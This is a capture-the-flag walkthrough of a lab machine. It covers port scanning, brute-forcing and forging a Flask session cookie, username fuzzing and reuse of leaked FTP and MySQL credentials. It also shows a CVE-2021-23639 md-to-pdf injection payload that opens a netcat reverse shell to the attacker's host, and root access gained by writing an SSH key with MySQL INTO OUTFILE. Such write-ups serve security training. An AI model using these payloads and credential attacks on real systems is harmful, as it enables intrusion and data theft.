nmap -p- --min-rate 10000 10.10.11.160 -Pn 
After detection of open ports, let's do greater nmap scan for these ports.
nmap -A -sC -sV -p21,22,5000 10.10.11.160 -Pn
Let's look at web application for port 5000.
Let's create account and try to understand dashboard page's working principle.
I looked at my cookie on HTTP request headers.
As this is Python application, let's try to decode this cookie via flask-unsign tool.
flask-unsign --decode --cookie '{cookie}'
Let's try to find secret value by brute-forcing via using rockyou.txt wordlist.
flask-unsign --unsign --cookie "{secret}" -w /usr/share/wordlists/rockyou.txt --no-literal-eval 
Let's try to encode Flask cookie via admin user.
flask-unsign --sign --cookie "{'logged_in': True, 'username': 'admin'}" --secret 'secret123'
But it doesn't work as because there's no admin user.
Let's fuzz possible usernames.
wfuzz -u http://10.10.11.160:5000/login -d "username=FUZZ&password=junkpassword" -w /usr/share/seclists/Usernames/Names/names.txt --hs "Invalid credentials"
From this result, I see that blue user is possible, let's create session cookie for this user.
flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'
While we replace this session cookie, I already on Dashboard of blue user.
I found such a leak which contains FTP credentials.
blue: blue@Noter!
Let's connect into FTP.
I get policy.pdf file and read content of this.
So due to this Password Creation, I can guess ftp_admin credentials.
ftp_admin: ftp_admin@Noter!
Let's connect into FTP via this credentials.
I get two backup files which have .zip extension.
I find hard-coded credentials from app.py file.
root: Nildogg36
On misc directory, I find a script called md-to-pdf.js file which uses mdToPdf library, I look at the version of this library on package-lock.json file.
I searched publicly known exploit for this library and find Code Injection vulnerability whose CVE-2021-23639.
Let's run payload to get reverse shell. I add this payload into Export directory from cloud feature on /export_note_remote endpoint.
---js\n((require("child_process")).execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 1337 >/tmp/f"))\n---RCEI also open http.server to serve this exploit file.
python3 -m http.server --bind 10.10.14.18 8080
I submit this HTTP url to get exploit file from my http.server.
Hola! I got reverse shell from port 1337.
Let's make interactive shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo;fg
export TERM=xterm
export SHELL=bash
user.txt
For Privilege Escalation, I will try to use credentials which I grabbed from .zip file on FTP for mysql service.
root: Nildogg36
Let's check this credentials work or not.
mysql -h 127.0.0.1 -u root -p
As we are root user, we can write data into files.
So,for Privilege Escalation, I just add my public key into root user's authorized_keys file via MySQL query.
select "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFNO12UEKYlk6zS+SIpXCvvW7+vf3Jx89Vaw5S9pdj7U root@kali" into outfile "/root/.ssh/authorized_keys2";
Note: This doesn't work for authorized_keys file, that's why I added 2 to end of file name.
Let's connect into machine via private key of attacker user by using ssh command.
ssh -i /root/.ssh/id_ed25519 root@10.10.11.160root.txt
